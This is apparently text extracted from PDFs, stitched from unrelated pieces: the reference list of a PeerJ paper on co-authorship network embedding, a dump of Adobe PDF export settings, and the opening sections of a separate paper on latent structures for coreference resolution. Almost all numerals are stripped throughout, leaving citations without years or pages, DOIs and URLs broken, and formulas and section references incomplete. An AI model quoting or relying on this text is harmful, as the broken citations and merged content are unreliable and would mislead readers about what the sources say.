comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: github: https://github.com/makarovia/jcdl . references abu-el-haija s, perozzi b, al-rfou r. . learning edge representations via low-rank asymmetric projections. in: proceedings of the acm on conference on information and knowledge management. new york: acm, – . adafre sf, de rijke m. . discovering missing links in wikipedia. in: proceedings of the rd international workshop on link discovery, linkkdd ’ . new york: acm, – . backstrom l, leskovec j. . supervised random walks: predicting and recommending links in social networks. in: proceedings of the fourth acm international conference on web search and data mining, wsdm ’ . new york: acm, – . barabási a-l, pósfai m. . network science. cambridge: cambridge university press. belkin m, niyogi p. . laplacian eigenmaps and spectral techniques for embedding and clustering. advances in neural information processing systems. cambridge: mit press, – . cai h, zheng vw, chang k. . a comprehensive survey of graph embedding: problems, techniques and applications. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . cao s, lu w, xu q. . grarep: learning graph representations with global structural information. in: proceedings of the th acm international on conference on information and knowledge management, cikm ’ , new york: acm, – . carstens bt, jensen mr, spaniel mf, hermansen a. . vertex similarity in graphs using feature learning. available at https://projekter.aau.dk/projekter/files/ / mi f ___vertex_similarity.pdf (accessed june ). cetorelli n, peristiani s. . prestigious stock exchanges: a network analysis of international financial centers. journal of banking & finance ( ): – doi . /j.jbankfin. . . . chang s, han w, tang j, qi g-j, aggarwal cc, huang ts. . heterogeneous network embedding via deep architectures. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ , new york: acm, – . chen h, li x, huang z. . link prediction approach to collaborative filtering. in: proceedings of the th acm/ieee-cs joint conference on digital libraries (jcdl ’ ), new york, ny, usa, – . chen h, perozzi b, al-rfou r, skiena s. . a tutorial on network embeddings. arxiv preprint arxiv: . . cho h, yu y. . link prediction for interdisciplinary collaboration via co-authorship network. social network analysis and mining ( ): doi . /s - - - . cui p, wang x, pei j, zhu w. . a survey on network embedding. ieee transactions on knowledge and data engineering, pages. available at https://ieeexplore.ieee.org/abstract/ document/ . elsevier. . scopus. available at http://www.scopus.com/ (accessed january ). gao f, musial k, cooper c, tsoka s. . link prediction methods and their accuracy for different social networks and network metrics. scientific programming : – doi . / / . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/makarovia/jcdl http://dx.doi.org/ . /tkde. . https://projekter.aau.dk/projekter/files/ /mi f ___vertex_similarity.pdf https://projekter.aau.dk/projekter/files/ /mi f ___vertex_similarity.pdf http://dx.doi.org/ . /j.jbankfin. . . http://dx.doi.org/ . /s - - - https://ieeexplore.ieee.org/abstract/document/ https://ieeexplore.ieee.org/abstract/document/ http://www.scopus.com/ http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gao s, denoyer l, gallinari p. . temporal link prediction by integrating content and structure information. in: proceedings of the th acm international conference on information and knowledge management, cikm ’ , new york: acm, – . goyal p, ferrara e. . graph embedding techniques, applications, and performance: a survey. knowledge-based systems : – doi . /j.knosys. . . . goyal p, hosseinmardi h, ferrara e, galstyan a. . capturing edge attributes via network embedding. arxiv preprint arxiv: . . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining, kdd ’ , new york: acm, – . hasan ma, zaki mj. . a survey of link prediction in social networks. boston: springer, – . he q, pei j, kifer d, mitra p, giles l. . context-aware citation recommendation. in: proceedings of the th international conference on world wide web, www ’ , new york: acm, – . huang x, li j, hu x. . label informed attributed network embedding. in: proceedings of the tenth acm international conference on web search and data mining, wsdm ’ , new york: acm, – . kipf tn, welling m. . variational graph auto-encoders. arxiv preprint arxiv: . . kong x, mao m, wang w, liu j, xu b. . voprec: vector representation learning of papers with text information and structural identity for recommendation. epub ahead of print april . ieee transactions on emerging topics in computing doi . /tetc. . . kossinets g, watts dj. . origins of homophily in an evolving social network. american journal of sociology ( ): – doi . / . le q, mikolov t. . distributed representations of sentences and documents. in: proceedings of the st international conference on machine learning (icml- ), cambridge: mit press, – . li x, chen h. . recommendation as link prediction: a graph kernel-based machine learning approach. in: proceedings of the th acm/ieee-cs joint conference on digital libraries, jcdl ’ . new york: acm, – . liang y, li q, qian t. . finding relevant papers based on citation relations. in: international conference on web-age information management, berlin: springer, – . liao l, he x, zhang h, chua t-s. . attributed social network embedding. arxiv preprint arxiv: . . liben-nowell d, kleinberg j. . the link-prediction problem for social networks. journal of the association for information science and technology ( ): – . liu y, kou z. . predicting who rated what in large-scale datasets. acm sigkdd explorations newsletter ( ): – doi . / . . lü l, zhou t. . link prediction in complex networks: a survey. physica a: statistical mechanics and its applications ( ): – . makarov i, bulanov o, gerasimova o, meshcheryakova n, karpov i, zhukov le. a. scientific matchmaker: collaborator recommender system. in: analysis of images, social networks and texts, cham: springer international publishing, – . makarov i, bulanov o, zhukov l. . co-author recommender system. in: springer proceedings in mathematics and statistic, berlin: springer, – . makarov i, gerasimova o, sulimov p, korovina k, zhukov l. a. joint node-edge network embedding for link prediction. in: springer proceedings in mathematics and statistic (to appear), berlin: springer, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /tetc. . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ makarov i, gerasimova o, sulimov p, zhukov l. b. co-authorship network embedding and recommending collaborators via network embedding. in: springer proceedings in mathematics and statistic (to appear), berlin: springer, – . makarov i, gerasimova o, sulimov p, zhukov le. b. recommending co-authorship via network embeddings and feature engineering: the case of national research university higher school of economics. in: proceedings of the th acm/ieee on joint conference on digital libraries. new york: acm, – . mcpherson m, smith-lovin l, cook jm. . birds of a feather: homophily in social networks. annual review of sociology ( ): – doi . /annurev.soc. . . . mikolov t, sutskever i, chen k, corrado gs, dean j. . distributed representations of words and phrases and their compositionality. in: advances in neural information processing systems, – . available at https://papers.nips.cc/paper/ -distributed-representations-of-words-and- phrases-and-their-compositionality.pdf. morel cm, serruya sj, penna go, guimarães r. . co-authorship network analysis: a powerful tool for strategic planning of research, development and capacity building programs on neglected diseases. plos neglected tropical diseases ( ):e doi . /journal.pntd. . national research university higher school of economics. . publications of hse. available at http://publications.hse.ru/en (accessed may ). newman mej. a. coauthorship networks and patterns of scientific collaboration. proceedings of the national academy of sciences of the united states of america (suppl ): – doi . /pnas. . newman me. b. who is the best connected scientist? a study of scientific coauthorship networks. complex networks : – . pan s, wu j, zhu x, zhang c, wang y. . tri-party deep network representation. network ( ): . perozzi b, al-rfou r, skiena s. . deepwalk: online learning of social representations. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ , new york: acm, – . robins g, snijders t, wang p, handcock m, pattison p. . recent developments in exponential random graph (p�) models for social networks. social networks ( ): – doi . /j.socnet. . . . roweis st, saul lk. . nonlinear dimensionality reduction by locally linear embedding. science ( ): – doi . /science. . . . scott j. . social network analysis. thousand oaks: sage. srinivas v, mitra p. . applications of link prediction. cham: springer international publishing, – . tang j, liu h. . unsupervised feature selection for linked social media data. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . tang j, qu m, wang m, zhang m, yan j, mei q. . line: large-scale information network embedding. in: proceedings of the th international conference on world wide web, www ‘ , republic and canton of geneva, switzerland: international world wide web conferences steering committee, – . tang j, zhang j, yao l, li j, zhang l, su z. . arnetminer: extraction and mining of academic social networks. in: kdd’ , new york, ny, usa, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /annurev.soc. . . https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf http://dx.doi.org/ . /journal.pntd. http://publications.hse.ru/en http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tang l, liu h. . leveraging social media networks for classification. data mining and knowledge discovery ( ): – doi . /s - - -x. tenenbaum jb, de silva, langford jc. . a global geometric framework for nonlinear dimensionality reduction. science ( ): – doi . /science. . . . velden t, lagoze c. . patterns of collaboration in co-authorship networks in chemistry-mesoscopic analysis and interpretation. in: th international conference on scientometrics and informetrics, rio de janeiro: issi society, – . vorontsov k, frei o, apishev m, romov p, dudarenko m. . bigartm. v . . . available at https://doi.org/ . /zenodo. . wang d, cui p, zhu w. . structural deep network embedding. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . wang p, xu b, wu y, zhou x. . link prediction in social networks: the state-of-the-art. science china information sciences ( ): – doi . /s - - -y. wasserman s, faust k. . social network analysis: methods and applications. vol. . cambridge: cambridge university press. wu h, lerman k. . network vector: distributed representations of networks with global context. arxiv preprint arxiv: . . yan e, ding y. . applying centrality measures to impact analysis: a coauthorship network analysis. journal of the american society for information science and technology ( ): – doi . /asi. . yan s, xu d, zhang b, zhang hj, yang q, lin s. . graph embedding and extensions: a general framework for dimensionality reduction. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . yang c, liu z, zhao d, sun m, chang ey. . network representation learning with rich text information. in: proceedings of the th international joint conference on artificial intelligence, palo alto, ca, usa, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /science. . . https://doi.org/ . /zenodo. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /asi. http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dual network embedding for representing research interests in the link prediction problem on co-authorship networks introduction related work dataset description and preprocessing feature engineering link embeddings training model experiments for a large network discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice latent structures for coreference resolution sebastian martschat and michael strube heidelberg institute for theoretical studies ggmbh schloss-wolfsbrunnenweg , heidelberg, germany (sebastian.martschat|michael.strube)@h-its.org abstract machine learning approaches to coreference resolution vary greatly in the modeling of the problem: while early approaches operated on the mention pair level, current research fo- cuses on ranking architectures and antecedent trees. we propose a unified representation of different approaches to coreference reso- lution in terms of the structure they operate on. we represent several coreference reso- lution approaches proposed in the literature in our framework and evaluate their perfor- mance. finally, we conduct a systematic anal- ysis of the output of these approaches, high- lighting differences and similarities. introduction coreference resolution is the task of determining which mentions in a text are used to refer to the same real-world entity. the era of statistical natural lan- guage processing saw the shift from rule-based ap- proaches (hobbs, ; lappin and leass, ) to increasingly sophisticated machine learning models. while early approaches cast the problem as binary classification of mention pairs (soon et al., ), recent approaches make use of complex structures to represent coreference relations (yu and joachims, ; fernandes et al., ). the aim of this paper is to devise a framework for coreference resolution that leads to a unified rep- resentation of different approaches to coreference resolution in terms of the structure they operate on. previous work in other areas of natural lan- guage processing such as parsing (klein and man- ning, ) and machine translation (lopez, ) has shown that providing unified representations of approaches to a problem deepens its understanding and can also lead to empirical improvements. by im- plementing popular approaches in this framework, we can highlight structural differences and similar- ities between them. furthermore, this establishes a setting to systematically analyze the contribution of the underlying structure to performance, while fix- ing parameters such as preprocessing and features. in particular, we analyze approaches to corefer- ence resolution and point out that they mainly dif- fer in the structures they operate on. we then note that these structures are not annotated in the train- ing data (section ). motivated by this observation, we develop a machine learning framework for struc- tured prediction with latent variables for coreference resolution (section ). we formalize the mention pair model (soon et al., ; ng and cardie, ), mention ranking architectures (denis and baldridge, ; chang et al., ) and antecedent trees (fer- nandes et al., ) in our framework and high- light key differences and similarities (section ). fi- nally, we present an extensive comparison and anal- ysis of the implemented approaches, both quantita- tive and qualitative (sections and ). our analy- sis shows that a mention ranking architecture with latent antecedents performs best, mainly due to its ability to structurally model determining anaphoric- ity. finally, we briefly describe how entity-centric approaches fit into our framework (section ). an open source toolkit which implements the ma- chine learning framework and the approaches dis- cussed in this paper is available for download . http://smartschat.de/software transactions of the association for computational linguistics, vol. , pp. – , . action editor: mark johnson. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by . license. modeling coreference resolution the aim of automatic coreference resolution is to predict a clustering of mentions such that each clus- ter contains all mentions that are used to refer to the same entity. however, most coreference resolution models reduce the problem to predicting coreference between pairs of mentions, and jointly or cascad- ingly consolidating these predictions. approaches differ in the scope (pairwise, per anaphor, per docu- ment, ...) they employ while learning a scoring func- tion for these pairs, and the way the consolidating is handled. the different ways to employ the scope and to consolidate decisions can be understood as operat- ing on latent structures: as pairwise links are not annotated in the data, coreference approaches create structures (either heuristically or data-driven) that guide the learning of the pairwise scoring function. to understand this better, let us consider two ex- amples. mention pair models (soon et al., ; ng and cardie, ) cast the problem as first cre- ating a list of mention pairs, and deciding for each pair whether the two mentions are coreferent. af- terwards the decisions are consolidated by a cluster- ing algorithm such as best-first or closest-first. we therefore can consider this approach to operate on a list of mention pairs where each pair is handled in- dividually. in contrast, antecedent tree models (fer- nandes et al., ; björkelund and kuhn, ) consider the whole document at once and predict a tree consisting of anaphor-antecedent pairs. a structured prediction framework in this section we introduce a structured prediction framework for learning coreference predictors with latent variables. when devising the framework, we focus on accounting for the latent structures under- lying coreference resolution approaches. the frame- work is a generalization of previous work on latent antecedents and trees for coreference resolution (yu and joachims, ; chang et al., ; fernandes et al., ). . setting in all prediction tasks, the goal is to learn a mapping f from inputs x ∈ x to outputs y ∈ yx. a predic- tion task is structured if the output elements y ∈yx exhibit some structure. as we work in a latent vari- able setting, we assume that yx = hx ×zx, and therefore y = (h,z) ∈ hx × zx. we call h the hidden or latent part, which is not observed in the data, and z the observed part (during training). we assume that z can be inferred from h, and that in a pair (h,z), h and z are always consistent. we first define the input space x and the output spaces hx and zx for x ∈x . . the input space x the input space consists of documents. we repre- sent a document x ∈ x as follows. let us assume that mx is the set of mentions (expressions which may be used to refer to entities) in the document. we write mx = {m , . . . ,mk}, where the mi are in ascending order with respect to their position in the document. we then consider m x = {m } ∪ mx, where m precedes every mi ∈ mx (chang et al., ; fernandes et al., ). m plays the role of a dummy mention for anaphoricity detection: if m is chosen as the an- tecedent, the corresponding mention is deemed as non-anaphoric. this enables joint coreference reso- lution and anaphoricity determination. . the latent space hx for an input x let x ∈x be some document. as we saw in the pre- vious section, approaches to coreference resolution predict a latent structure which is not annotated in the data but is used to infer coreference information. inspired by previous work on coreference (bengtson and roth, ; fernandes et al., ; martschat and strube, ), we now develop a graph-based representation for these structures. a valid latent structure for the document x is a labeled directed graph h = (v,a,la) where • the set of nodes are the mentions, v = m x, • the set of edges a consists of links between mentions pointing back in the text, a ⊆{(mj,mi) |j > i}⊆ mx ×m x. • la : a → l assigns a label ` ∈ l to each edge. l is a finite set of labels, for example signaling coreference or non-coreference. we split h into subgraphs (called substructures from now on), which we notate as h = h ⊕. . .⊕hn, with hi = (vi,ai,lai) ∈ hx,i, where hx,i is the latent space for an input x restricted to the mentions appearing in hi. hi encodes coreference decisions for a subset of mentions in x. m m m m − + − − + + figure : graph-based representation of the mention pair model. the dashed box shows one substructure of the structure. figure depicts a graph that captures the latent structure underlying the mention pair model. men- tion pairs are represented as node connected by an edge. the edge either has label “+” (if the mentions are coreferent) or “−” (otherwise). as the mention pair model considers each mention pair individually, each edge is one substructure of the latent structure (expressed via the dashed box). we describe this representation in more detail in section . . . the observed output space zx for an input x let x ∈x be some document. the observed output space consists of all functions ex : mx → n that map mentions to entity identifiers. two mi,mj ∈ mx are coreferent if and only if ex(mi) = ex(mj). ex is inferred from the latent structure, e.g. by taking the transitive closure over coreference decisions. this representation corresponds to the way coref- erence is annotated in corpora. . linear models let us write h = ∪x∈xhx for the full latent space (analogously z). our goal is to learn the mapping f : x → h×z. we assume that the mapping is parametrized by a weight vector θ ∈ rd, and there- fore write f = fθ. we restrict ourselves to linear models. that is, fθ(x) = arg max (h,z)∈hx×zx 〈θ,φ(x,h,z)〉, where φ: x ×h×z → rd is a joint feature func- tion for inputs and candidate outputs. since h = h ⊕ . . .⊕hn, we have fθ(x) = arg max (h,z)∈hx×zx 〈θ,φ(x,h,z)〉 = n⊕ i= arg max (hi,z)∈hx,i×zx 〈θ,φ(x,hi,z)〉. in this paper, we only consider feature functions which factor with respect to the edges in hi = (vi,ai,lai), i.e. φ(x,hi,z) = ∑ a∈ai φ(x,a,z). hence, the features examine properties of mention pairs, such as head word of each mention, number of each mention, or the existence of a string match. we describe the feature set used for all approaches represented in our framework in section . . . decoding given an input x ∈ x and a weight vector θ ∈ rd, we obtain the prediction by solving the arg max equation described in the previous subsection. this can be viewed as searching the output space hx×zx for the highest scoring output pair (h,z). the details of the search procedure depend on the space hx of latent structures and the factorization into substructures. for the structures we consider in this paper, the maximization can be solved exactly via greedy search. for structures with complex con- straints like transitivity, more complex or even ap- proximate search methods need to be used (klenner, ; finkel and manning, ). . learning we assume a supervised learning setting with latent variables, i.e., we have a training set of documents d = {( x(i),z(i) ) | i = , . . . ,m } at our disposal. note that the latent structures are not encoded in this training set. in principle we would like to directly optimize for the evaluation metric we are interested in. un- fortunately, the evaluation metrics used in corefer- ence do not allow for efficient optimization based on mention pairs, since they operate on the entity level. for example, the ceafe metric (luo, ) needs to compute optimal entity alignments between gold and system entities. these alignments do not factor with respect to mention pairs. we therefore have to use some surrogate loss. algorithm structured latent perceptron with cost- augmented inference. input: training set d, a cost function c, number of epochs n. function perceptron(d, c, n) set θ = ( , . . . , ) for epoch = , . . . ,n do for (x,z) ∈d do for each substructure do ĥopt,i = arg max hi∈const(hx,z,i) 〈θ,φ(x,hi,z)〉 (ĥi, ẑ) = arg max (hi,z)∈hx,i×zx (〈θ,φ(x,hi,z)〉 +c(x,hi, ĥopt,i,z)) if ĥi does not partially encode z then set θ = θ + φ(x,ĥopt,i,z) −φ(x,ĥi, ẑ) output: a weight vector θ. we employ a structured latent perceptron (sun et al., ) extended with cost-augmented inference (crammer et al., ) to learn the parameters of the models we discuss. while this restricts us to a particular objective to optimize, it comes with var- ious advantages: the implementation is simple and fast, we can incorporate error functions via cost- augmentation, the structures are plug-and-play if we provide a decoder, and the (structured) perceptron with cost-augmented inference has exhibited good performance for coreference resolution (chang et al., ; fernandes et al., ). to describe the algorithm, we need some addi- tional terminology. let (x,z) be a training exam- ple. let (ĥ, ẑ) = fθ(x) be the prediction under the model parametrized by θ. let hx,z be the space of all latent structures for an input x that are consistent with a coreference output z. structures in hx,z pro- vide substitutes for gold structures in training. some approaches restrict hx,z, for example by learning only from the closest antecedent of a mention (denis and baldridge, ). hence, we consider the con- strained space const(hx,z) ⊆ hx,z, where const is a function that depends on the approach in focus. ĥopt = arg max h∈const(hx,z) 〈θ,φ(x,h,z)〉 is the optimal constrained latent structure under the current model which is consistent with z. we write ĥi and ĥopt,i for the ith substructure of the latent structure. to estimate θ, we iterate over the training data. for each input, we compute the optimal constrained prediction consistent with the gold information, ĥopt,i. we then compute the optimal prediction (ĥi, ẑ), but also include the cost function c in our maximization problem. this favors solutions with high cost, which leads to a large margin approach. if ĥi does not partially encode the gold data, we update the weight vector. this is repeated for a given number of epochs . algorithm gives a more for- mal description. latent structures in the previous section we developed a machine learning framework for coreference resolution. it is flexible with respect to • the latent structure h ∈hx for an input x, • the substructures of h ∈hx, • the constrained space of latent structures con- sistent with a gold solution const(hx,z), and • the cost function c and its factorization. in this paper, we focus on giving a unified represen- tation and in-depth analysis of prevalent coreference models from the literature. future work should in- vestigate devising and analyzing novel representa- tions for coreference resolution in the framework. we express three main coreference models in our framework, the mention pair model (soon et al., ), the mention ranking model (denis and baldridge, ; chang et al., ) and antecedent trees (yu and joachims, ; fernandes et al., ; björkelund and kuhn, ). we character- ize each approach by the latent structure it operates on during learning and inference (we assume that all approaches we consider share the same features). furthermore, we also discuss the factorization into substructures and typical cost functions used in the literature. . mention pair model we first consider the mention pair model. in its orig- inal formulation, it extracts mention pairs from the we also shuffle the data before each epoch and use averag- ing (collins, ). data and labels these as positive or negative. during testing, all pairs are extracted and some clustering algorithm such as closest-first or best-first is applied to the list of pairs. during training, some heuristic is applied to help balancing positive and negative ex- amples. the most popular heuristic is to take the closest antecedent of an anaphor as a positive exam- ple, and all pairs in between as negative examples. latent structure. in our framework, we can rep- resent the mention pair model as a labeled graph. in particular, let the set of edges be all backward- pointing edges, i.e. a = {(mj,mi) |j > i}. in the testing phase, we operate on the whole set a. dur- ing training, we consider only a subset of edges, as defined by the heuristic used by the approach. the labeling function maps a pair of mentions to a positive (“+”) or a negative label (“−”) via la(mj,mi) = { + mj,mi are coreferent, − otherwise. one such graph is depicted in figure (section ). a clustering algorithm (like closest-first or best- first) is then employed to infer the coreference infor- mation from this latent structure. substructures. in the mention pair model, the parts of the substructures are the individual edges: each pair of mentions is considered as an instance from which the model learns and which the model predicts individually. cost function. as discussed above, mention pair approaches employ heuristics to resample the training data. this is a common method to in- troduce cost-sensitivity into classification (elkan, ; geibel and wysotzk, ). hence, mention pair approaches do not use cost functions in addition to the resampling. . mention ranking model the mention ranking model captures competition between antecedents: for each anaphor, the highest- scoring antecedent is selected. for training, this ap- proach needs gold antecedents to compare to. there are two main approaches to determine these: first, they are heuristically extracted similarly to the men- tion pair model (denis and baldridge, ; rah- man and ng, ). second, latent antecedents are employed (chang et al., ): in such models, the highest-scoring preceding coreferent mention of an anaphor under the current model is selected as the gold antecedent. m m m m m m figure : latent structure underlying the mention ranking and the antecedent tree approach. the black nodes and arcs represent one substructure for the mention ranking approach. latent structure. the mention ranking ap- proach can be represented as an unlabeled graph. in particular, we allow any graph with edges a ⊆ {(mj,mi) | j > i} such that for all j there is exactly one i with (mj,mi) ∈ a (each anaphor has exactly one antecedent). figure shows an example graph. we can represent heuristics for creating train- ing data by constraining the latent structures con- sistent with the gold information hx,z. again, the most popular heuristic is to consider the clos- est antecedent of a mention as the gold an- tecedent during training (denis and baldridge, ). this corresponds to constraining hx,z such that const(hx,z) = {h} with h = (v,a,la) and (mj,mi) ∈ a if and only if mi is the closest an- tecedent of mj. when learning from latent an- tecedents, the unconstrained space hx,z is consid- ered. to infer coreference information from this la- tent structure, we take the transitive closure over all anaphor-antecedent decisions encoded in the graph. substructures. the distinctive feature of the mention ranking approach is that it consid- ers each anaphor in isolation, but all candidate antecedents at once. we therefore define sub- structures as follows. the jth substructure is the graph hj with nodes vj = {m , . . . ,mj} and aj = {(mj,mi) | there is i with j > i s.t. (mj,mi) ∈ a}. aj contains the antecedent decision for mj. one such substructure encoding the antecedent decision for m is colored black in figure . cost function. cost functions for the mention ranking model can reward the resolution of spe- cific classes. the most sophisticated cost func- tion was proposed by durrett and klein ( ), who distinguish between three errors: finding an antecedent for a non-anaphoric mention, misclassi- fying an anaphoric mention as non-anaphoric, and finding a wrong antecedent for an anaphoric men- tion. we will use a variant of this cost function in our experiments (described in section . ). . antecedent trees finally, we consider antecedent trees. this structure encodes all antecedent decisions for all anaphors. in our framework they can be understood as an exten- sion of the mention ranking approach to the docu- ment level. so far, research did not investigate con- straints on the space of latent structures consistent with the gold annotation. latent structure. antecedent trees are based on the same structure as the mention ranking approach. substructures. in the antecedent tree approach, the latent structure does not factor in parts: the whole graph encoding all antecedent information for all mentions is treated as an instance. cost function. the cost function from the men- tion ranking model naturally extends to the tree case by summing over all decisions. furthermore, in principle we can take the structure into account. however, we are not aware of any approaches which go beyond (variations of) hamming loss (hamming, ). experiments we now evaluate model variants based on different latent structures on a large benchmark corpus. the aim of this section is to compare popular approaches to coreference only in terms of the structure they op- erate on, fixing preprocessing and feature set. in section we complement this comparison with a qualitative analysis of the influence of the structures on the output. . data and evaluation metrics the aim of our evaluation is to assess the effec- tiveness and competitiveness of the models imple- mented in our framework in a realistic coreference setting, i.e. without using gold information such as gold mentions. as all models we consider share the same preprocessing and features, this allows for a fair comparison of the individual structures. we train, evaluate and analyze the models on the english data of the conll- shared task on multilingual coreference resolution (pradhan et al., ). the shared task organizers provide the train- ing/development/ test split. we use the training documents for training the models, and evaluate and analyze the models on the development set contain- ing documents. the test set documents are only used for final evaluation. we work in a setting that corresponds to the shared task’s closed track (pradhan et al., ). that is, we make use of the automatically created annotation layers (parse 